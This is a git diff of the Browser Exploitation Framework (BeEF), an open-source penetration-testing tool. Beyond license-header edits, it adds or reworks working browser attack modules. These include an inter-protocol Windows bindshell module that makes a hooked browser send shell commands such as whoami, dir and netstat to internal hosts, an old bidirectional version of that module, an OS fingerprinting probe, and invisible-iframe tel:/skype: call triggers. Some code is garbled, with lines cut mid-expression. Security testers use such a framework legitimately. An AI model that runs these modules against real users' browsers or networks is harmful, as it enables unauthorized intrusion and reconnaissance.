+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/host/hook_default_browser/module.rb b/modules/host/hook_default_browser/module.rb
index bcb1488fb..f85f6e8af 100644
--- a/modules/host/hook_default_browser/module.rb
+++ b/modules/host/hook_default_browser/module.rb
@@ -1,24 +1,15 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 class Hook_default_browser < BeEF::Core::Command
 
   def self.options
     configuration = BeEF::Core::Configuration.instance
-    hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/report.html"
+    proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
+    hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/report.html"
     return [
         #{'name' => 'url', 'ui_label'=>'URL', 'type' => 'text', 'width' => '400px', 'value' => hook_uri },
     ]
@@ -26,11 +17,12 @@ class Hook_default_browser < BeEF::Core::Command
 
   def pre_send
 
-    #Get the servers configurations.
-    configuration = BeEF::Core::Configuration.instance
+		#Get the servers configurations.
+		configuration = BeEF::Core::Configuration.instance
+		proto = configuration.get("beef.http.https.enable") == true ? "https" : "http"
 		
 		#The hook url to be replace the token in the original pdf file.
-		hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/report.html"
+		hook_uri = "#{proto}://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/report.html"
 		
 		# A new pdf file containg the actual hook URI instead of the dummy token.
 		configured_hook_file = File.open("./modules/host/hook_default_browser/bounce_to_ie_configured.pdf","w")
diff --git a/modules/host/insecure_url_skype/command.js b/modules/host/insecure_url_skype/command.js
index 6521d73bc..3d44fbe33 100644
--- a/modules/host/insecure_url_skype/command.js
+++ b/modules/host/insecure_url_skype/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 	var sploit = beef.dom.createInvisibleIframe();
 	sploit.src = 'skype:<%= @tel_num %>?call';
diff --git a/modules/host/insecure_url_skype/config.yaml b/modules/host/insecure_url_skype/config.yaml
index cb35a4c23..93573e876 100644
--- a/modules/host/insecure_url_skype/config.yaml
+++ b/modules/host/insecure_url_skype/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/host/insecure_url_skype/module.rb b/modules/host/insecure_url_skype/module.rb
index 2b19303ed..2098e45d2 100644
--- a/modules/host/insecure_url_skype/module.rb
+++ b/modules/host/insecure_url_skype/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Insecure_url_skype < BeEF::Core::Command
 
diff --git a/modules/host/iphone_tel/command.js b/modules/host/iphone_tel/command.js
index 18966fc49..f52d271e8 100644
--- a/modules/host/iphone_tel/command.js
+++ b/modules/host/iphone_tel/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 	var sploit = beef.dom.createInvisibleIframe();
 	sploit.src = 'tel:<%= @tel_num %>';
diff --git a/modules/host/iphone_tel/config.yaml b/modules/host/iphone_tel/config.yaml
index 783637ed4..cae35d0eb 100644
--- a/modules/host/iphone_tel/config.yaml
+++ b/modules/host/iphone_tel/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/host/iphone_tel/module.rb b/modules/host/iphone_tel/module.rb
index 2d14f1c25..a2ebe4586 100644
--- a/modules/host/iphone_tel/module.rb
+++ b/modules/host/iphone_tel/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Iphone_tel < BeEF::Core::Command
 
diff --git a/modules/host/os_fingerprinting/command.js b/modules/host/os_fingerprinting/command.js
new file mode 100644
index 000000000..2c56114f9
--- /dev/null
+++ b/modules/host/os_fingerprinting/command.js
@@ -0,0 +1,44 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var os_version = new Array;
+	var dom = document.createElement('b');
+
+	Array.prototype.unique = function() {
+		var o = {}, i, l = this.length, r = [];
+		for(i=0; i", <%= @command_id %>, "windows_nt_version="+os_version.unique());
+	};
+
+	// OS fingerprints // in the form of: "URI","NT version(s)"
+	var fingerprints = new Array(
+		new Array("5.1+","res://IpsmSnap.dll/wlcm.bmp"),
+		new Array("5.1+","res://wmploc.dll/257/album_0.png"),
+		new Array("5.1-6.0","res://wmploc.dll/23/images\amg-logo.gif"),
+		new Array("5.1-6.1","res://wmploc.dll/wmcomlogo.jpg"),
+		new Array("6.0+","res://wdc.dll/error.gif")
+	);
+
+	for (var i=0; i = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", irc_commands);
 	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=IRC command sent");
 
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(irc_iframe_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", 15000);
+
 });
diff --git a/modules/ipec/inter_protocol_irc/config.yaml b/modules/ipec/inter_protocol_irc/config.yaml
index 1341b4b7c..45f9a382a 100644
--- a/modules/ipec/inter_protocol_irc/config.yaml
+++ b/modules/ipec/inter_protocol_irc/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/ipec/inter_protocol_irc/module.rb b/modules/ipec/inter_protocol_irc/module.rb
index cad8d0380..e4ad13045 100644
--- a/modules/ipec/inter_protocol_irc/module.rb
+++ b/modules/ipec/inter_protocol_irc/module.rb
@@ -1,27 +1,17 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Inter_protocol_irc < BeEF::Core::Command
 
   def self.options
     return [
-	{'name' => 'server', 'ui_label' => 'IRC Server', 'value' => '127.0.0.1'},
-	{'name' => 'port', 'ui_label' => 'Port', 'value' => '6667'},
-        {'name' => 'nick', 'ui_label' => 'Username', 'value' => 'user1234__'},
-        {'name' => 'channel', 'ui_label' => 'Channel', 'value' => '#channel1'},
-        {'name' => 'message', 'ui_label' => 'Message', 'value' => 'Message sent from the Browser Exploitation Framework!'}
+	{'name' => 'rhost',   'ui_label' => 'IRC Server', 'value' => '127.0.0.1'},
+	{'name' => 'rport',   'ui_label' => 'Port',       'value' => '6667'},
+        {'name' => 'nick',    'ui_label' => 'Username',   'value' => 'user1234__'},
+        {'name' => 'channel', 'ui_label' => 'Channel',    'value' => '#channel1'},
+        {'name' => 'message', 'ui_label' => 'Message',    'value' => 'Message sent from the Browser Exploitation Framework!'}
     ]
   end
 
diff --git a/modules/ipec/inter_protocol_posix_bindshell/command.js b/modules/ipec/inter_protocol_posix_bindshell/command.js
index f8e228380..90bb06002 100644
--- a/modules/ipec/inter_protocol_posix_bindshell/command.js
+++ b/modules/ipec/inter_protocol_posix_bindshell/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var target_ip = "<%= @ip %>";
diff --git a/modules/ipec/inter_protocol_posix_bindshell/config.yaml b/modules/ipec/inter_protocol_posix_bindshell/config.yaml
index 474d0940c..3c65d2aa7 100644
--- a/modules/ipec/inter_protocol_posix_bindshell/config.yaml
+++ b/modules/ipec/inter_protocol_posix_bindshell/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/ipec/inter_protocol_posix_bindshell/module.rb b/modules/ipec/inter_protocol_posix_bindshell/module.rb
index 063cb66d7..0683df646 100644
--- a/modules/ipec/inter_protocol_posix_bindshell/module.rb
+++ b/modules/ipec/inter_protocol_posix_bindshell/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 =begin
 [+] Summary:
diff --git a/modules/ipec/inter_protocol_win_bindshell/command.js b/modules/ipec/inter_protocol_win_bindshell/command.js
index 4d4729420..7fbe8b05e 100644
--- a/modules/ipec/inter_protocol_win_bindshell/command.js
+++ b/modules/ipec/inter_protocol_win_bindshell/command.js
@@ -1,88 +1,46 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
-	var target_ip = "<%= @ip %>";
-	var target_port = "<%= @port %>";
-	var cmd = "<%= @cmd %>";
-	var timeout = "<%= @command_timeout %>";
-	var internal_counter = 0;
-
-	cmd += " & echo __END_OF_WIN_IPC<%= @command_id %>__ & echo 
\"\" & echo 
\"\"";
-
-	var iframe = document.createElement("iframe");
-	iframe.setAttribute("id","ipc_win_window_<%= @command_id %>");
-	iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;");
-	document.body.appendChild(iframe);
-
-	function do_submit(ip, port, content) {
-
-		var action = "http://" + ip + ":" + port + "/index.html?&cmd&";
-		var parent = window.location.href;
-
-		myform=document.createElement("form");
-		myform.setAttribute("name","data");
-		myform.setAttribute("method","post");
-		myform.setAttribute("enctype","multipart/form-data");
-		myform.setAttribute("action",action);
-		document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.document.body.appendChild(myform); 
-	
-		myExt = document.createElement("INPUT");
-		myExt.setAttribute("id",<%= @command_id %>);
-		myExt.setAttribute("name",<%= @command_id %>);
-		myExt.setAttribute("value",content);
-		myform.appendChild(myExt);
-		myExt = document.createElement("INPUT");
-		myExt.setAttribute("id","endTag");
-		myExt.setAttribute("name","
");
-		myExt.setAttribute("value","echo window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\"ipc_content\").innerHTML);\"\" & exit");
-
-		myform.appendChild(myExt);
-		myform.submit();
+	// validate payload
+	try {
+		var cmd = '<%= @commands.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());
+		return;
 	}
 
-	function waituntilok() {
-
-		try {
-			if (/#ipc_result=/.test(document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location)) {
-				ipc_result = document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location.href;
-				output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+12,ipc_result.lastIndexOf('__END_OF_WIN_IPC<%= @command_id %>__'));
-				beef.net.send('<%= @command_url %>', <%= @command_id %>, "result="+decodeURI(output.replace(/%0A/gi, "
")).replace(//g, ">").replace(/<br>/gi, "
"));
-				document.body.removeChild(iframe);
-				return;
-			} else throw("command results haven't been returned yet");
-		} catch (e) {
-			internal_counter++;
-			if (internal_counter > timeout) {
-				beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timeout after '+timeout+' seconds');
-				document.body.removeChild(iframe);
-				return;
-			}
-			setTimeout(function() {waituntilok()},1000);
-		}
+	// validate target host
+	var rhost = "<%= @rhost %>";
+	if (!rhost) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target host');
+		return;
 	}
 
-	if (!target_port || !target_ip || isNaN(target_port)) {
-		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed target host or target port');
-	} else if (target_port > 65535 || target_port < 0) {
+	// validate target port
+	var rport = "<%= @rport %>";
+	if (!rport || rport > 65535 || rport < 0 || isNaN(rport)) {
 		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');
-	} else {
-		do_submit(target_ip, target_port, cmd);
-		waituntilok();
+		return;
 	}
 
+	// validate timeout
+	var timeout = "<%= @timeout %>";
+	if (isNaN(timeout)) timeout = 30;
+
+	// send commands
+	var win_ipec_form_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html?&cmd&", cmd + " & exit");
+	beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Shell commands sent');
+
+	// clean up
+	cleanup = function() {
+		document.body.removeChild(win_ipec_form_<%= @command_id %>);
+	}
+	setTimeout("cleanup()", timeout * 1000);
+
 });
 
diff --git a/modules/ipec/inter_protocol_win_bindshell/command.old.js b/modules/ipec/inter_protocol_win_bindshell/command.old.js
new file mode 100644
index 000000000..909637463
--- /dev/null
+++ b/modules/ipec/inter_protocol_win_bindshell/command.old.js
@@ -0,0 +1,86 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+// This is the old module which supports bi-directional communications for Firefox before version ~16
+beef.execute(function() {
+
+	var target_ip   = "<%= @ip %>";
+	var target_port = "<%= @port %>";
+	var cmd         = "<%= @cmd %>";
+	var timeout     = "<%= @command_timeout %>";
+	var internal_counter = 0;
+
+	cmd += " & echo __END_OF_WIN_IPC<%= @command_id %>__ & echo
\"\" & echo
\"\""; + + var iframe = document.createElement("iframe"); + iframe.setAttribute("id","ipc_win_window_<%= @command_id %>"); + iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;"); + document.body.appendChild(iframe); + + function do_submit(ip, port, content) { + + var action = "http://" + ip + ":" + port + "/index.html?&cmd&"; + var parent = window.location.href; + + myform=document.createElement("form"); + myform.setAttribute("name","data"); + myform.setAttribute("method","post"); + myform.setAttribute("enctype","multipart/form-data"); + myform.setAttribute("action",action); + document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.document.body.appendChild(myform); + + myExt = document.createElement("INPUT"); + myExt.setAttribute("id",<%= @command_id %>); + myExt.setAttribute("name",<%= @command_id %>); + myExt.setAttribute("value",content); + myform.appendChild(myExt); + myExt = document.createElement("INPUT"); + myExt.setAttribute("id","endTag"); + myExt.setAttribute("name","
"); + myExt.setAttribute("value","echo window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\"ipc_content\").innerHTML);\"\" & exit"); + + myform.appendChild(myExt); + myform.submit(); + } + + function waituntilok() { + + try { + if (/#ipc_result=/.test(document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location)) { + ipc_result = document.getElementById("ipc_win_window_<%= @command_id %>").contentWindow.location.href; + output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+12,ipc_result.lastIndexOf('__END_OF_WIN_IPC<%= @command_id %>__')); + beef.net.send('<%= @command_url %>', <%= @command_id %>, "result="+decodeURI(output.replace(/%0A/gi, "
")).replace(//g, ">").replace(/<br>/gi, "
")); + document.body.removeChild(iframe); + return; + } else throw("command results haven't been returned yet"); + } catch (e) { + internal_counter++; + if (internal_counter > timeout) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timeout after '+timeout+' seconds'); + document.body.removeChild(iframe); + return; + } + setTimeout(function() {waituntilok()},1000); + } + } + + // validate target host + if (!target_ip) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target host'); + return; + } + + // validate target port + if (!target_port || target_port > 65535 || target_port < 0 || isNaN(target_port)) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port'); + return; + } + + // send commands + do_submit(target_ip, target_port, cmd); + waituntilok(); + +}); + diff --git a/modules/ipec/inter_protocol_win_bindshell/config.yaml b/modules/ipec/inter_protocol_win_bindshell/config.yaml index e49666a0a..3240851df 100644 --- a/modules/ipec/inter_protocol_win_bindshell/config.yaml +++ b/modules/ipec/inter_protocol_win_bindshell/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: @@ -19,8 +9,8 @@ beef: enable: true category: "IPEC" name: "Bindshell (Windows)" - description: "Using Inter-protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input field.

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet." + description: "Using Inter-Protocol Exploitation/Communication (IPEC) the hooked browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input field.

The target address can be on the hooked browser's subnet which is potentially not directly accessible from the Internet.

The results of the commands are not returned to BeEF.

Note: ampersands are required to seperate commands." authors: ["bcoles", "wade"] target: - working: ["FF"] - not_working: ["C", "S", "O", "IE"] + working: ["FF", "C"] + not_working: ["S", "O", "IE"] diff --git a/modules/ipec/inter_protocol_win_bindshell/module.rb b/modules/ipec/inter_protocol_win_bindshell/module.rb index c8b4e2565..7be2302e3 100644 --- a/modules/ipec/inter_protocol_win_bindshell/module.rb +++ b/modules/ipec/inter_protocol_win_bindshell/module.rb @@ -1,80 +1,31 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # =begin -[+] Summary: - -Using Inter-protocol Communication (IPC) the zombie browser will send commands to a listening Windows shell bound on the target specified in the 'Target Address' input. The target address can be on the zombie's subnet which is potentially not directly accessible from the Internet. - -The command results are returned to the BeEF control panel. - -[+] Tested: - -o Working: - o Mozilla Firefox 4 - o Mozilla Firefox 5 - -o Not Working: - o Mozilla Firefox 5 with the NoScript extension - o Internet Explorer 8+ - o Chrome 13 - o Opera 11 - o Safari 5 - -[+] Notes: - -o The bindshell is closed once the module has completed. This is necessary otherwise the cmd.exe process will hang. To avoid this issue: - - o use the netcat persistent listen "-L" option rather than the listen "-l" option; or - - o remove the "& exit" portion of the JavaScript payload. Be aware that this will leave redundant cmd.exe processes running on the target system. - -o The NoScript extension for Firefox aborts the request when attempting to access a host on the internal network and displays the following warning: - - [ABE] Deny on {POST http://localhost:4444/index.html?&cmd& <<< about:blank - 7} - SYSTEM rule: - Site LOCAL - Accept from LOCAL - Deny - -o Internet Explorer is not supported as IE 8+ does not allow posting data to internal network addresses. Earlier versions of IE have not been tested. - -o Returning the shell command results is not supported in Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe. The shell commands are executed on the target shell however. - -o This module is incompatible with autorun. Upon completing the shell commands it will load the original hooked window in a child iframe resulting in an additional hook. This will result in an infinite loop if this module is set to autorun. +The bindshell is closed once the module has completed. This is necessary otherwise the cmd.exe process will hang. To avoid this issue: + - use the netcat persistent listen "-L" option rather than the listen "-l" option; or + - remove the "& exit" portion of the JavaScript payload. Be aware that this will leave redundant cmd.exe processes running on the target system. +Returning the shell command results is not supported in Firefox ~16+, IE, Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe due to content-type restrictions. The shell commands are executed on the target shell however. =end class Inter_protocol_win_bindshell < BeEF::Core::Command def self.options return [ - {'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'}, - {'name'=>'port', 'ui_label' => 'Target Port', 'value' => '4444'}, - {'name'=>'command_timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'}, - {'name'=>'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the ampersands are required to seperate commands', 'type'=>'textarea', 'value'=>'echo User: & whoami & echo Directory Contents: & dir & echo HostName: & hostname & ipconfig & netstat -an', 'width'=>'200px' } + {'name'=>'rhost', 'ui_label'=>'Target Address', 'value'=>'127.0.0.1'}, + {'name'=>'rport', 'ui_label'=>'Target Port', 'value'=>'4444'}, + {'name'=>'timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'}, + {'name'=>'commands','ui_label'=>'Shell Commands', 'description'=>'Enter shell commands to execute. Note: ampersands are required to seperate commands', 'type'=>'textarea', 'value'=>'echo User: & whoami & echo Directory Path: & pwd & echo Directory Contents: & dir & echo HostName: & hostname & ipconfig & netstat -an', 'width'=>'200px' } ] end def post_execute content = {} content['result'] = @datastore['result'] if not @datastore['result'].nil? - content['fail'] = @datastore['fail'] if not @datastore['fail'].nil? - if content.empty? - content['fail'] = 'No data was returned.' - end + content['fail'] = @datastore['fail'] if not @datastore['fail'].nil? save content end end diff --git a/modules/metasploit/browser_autopwn/command.js b/modules/metasploit/browser_autopwn/command.js index 11829cca4..9c3004143 100644 --- a/modules/metasploit/browser_autopwn/command.js +++ b/modules/metasploit/browser_autopwn/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + 